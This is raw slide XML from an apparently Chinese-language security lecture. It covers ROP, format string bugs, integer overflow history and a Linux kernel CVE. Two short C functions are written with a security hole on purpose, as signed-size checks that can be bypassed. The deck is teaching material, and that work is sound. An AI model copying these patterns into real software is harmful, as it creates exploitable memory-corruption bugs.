          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2005" name="Shape 2005"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4895461" y="2155945"/>
            <a:ext cx="3687200" cy="935600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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06" name="Shape 2006"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4895461" y="4448177"/>
            <a:ext cx="3687200" cy="1560000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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 name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65B043C4-0960-46F3-90DB-2D5B9A9AF058}"/>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其它</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>技巧</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D03D8DB-F1DE-4D53-AC7F-FE07611372DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1883229"/>
            <a:ext cx="12192000" cy="4974771"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod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D62D3185-EEB2-4471-B209-5E958373A434}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="527342" y="387927"/>
            <a:ext cx="10935751" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Part</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="7200" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>格式化字符串漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{780F7D27-A0AC-4D7E-8CEE-E2AA96811627}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2611582" y="2885899"/>
            <a:ext cx="7730836" cy="2062103"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750"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泄露栈内存</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泄露任意地址内存</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篡改栈内存</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篡改任意地址内存</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="214568615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2022"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2023" name="Shape 2023"/>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Integer Overflow</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2024" name="Shape 2024"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1536700"/>
            <a:ext cx="11360150" cy="4554538"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>History</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>European Space Agency spacecraft Cluster I's satellites exploded because of integer overflow (1996)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>M. Dowd, C. Spencer, N. Metha, N. Herath, and H. Flake. Advanced Software Vulnerability Assessment. In Blackhat USA, August 2002</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IO2BO</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Array index out of bounds</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2025" name="Shape 2025"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="818433" y="4370667"/>
            <a:ext cx="5237200" cy="2023600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="304792" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>void safe_memcpy(char *src, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>int size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>) {</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="304792" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    char dst[512];</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="304792" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t> &lt; 512) {</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="304792" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>        memcpy(dst, src, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="304792" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    }</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="304792" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2026" name="Shape 2026"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6558200" y="4375267"/>
            <a:ext cx="4806000" cy="2014400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="304792" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>void safe_set_element(char *arr, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>int index</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>, char value, int arr_size) {</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="304792" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>index</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t> &lt; arr_size) {</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="304792" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>        arr[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>index</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>] = value;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="304792" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    }</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="304792" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2027" name="Shape 2027"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1161733" y="4075467"/>
            <a:ext cx="1536400" cy="3936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b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>IO2BO</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2028" name="Shape 2028"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6705200" y="4075467"/>
            <a:ext cx="2354400" cy="3936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b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Array index OOB</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Aria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2032"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2033" name="Shape 2033"/>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Integer Overflow in Linux kernel</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2034" name="Shape 2034"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539233" y="1841433"/>
            <a:ext cx="6083600" cy="41324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t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>CVE-2013-1763 Linux Kernel netlink message family number overflow</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>net/core/sock_diag.c View file @ 6e601a5</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>@@ -121,6 +121,9 @@ static int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
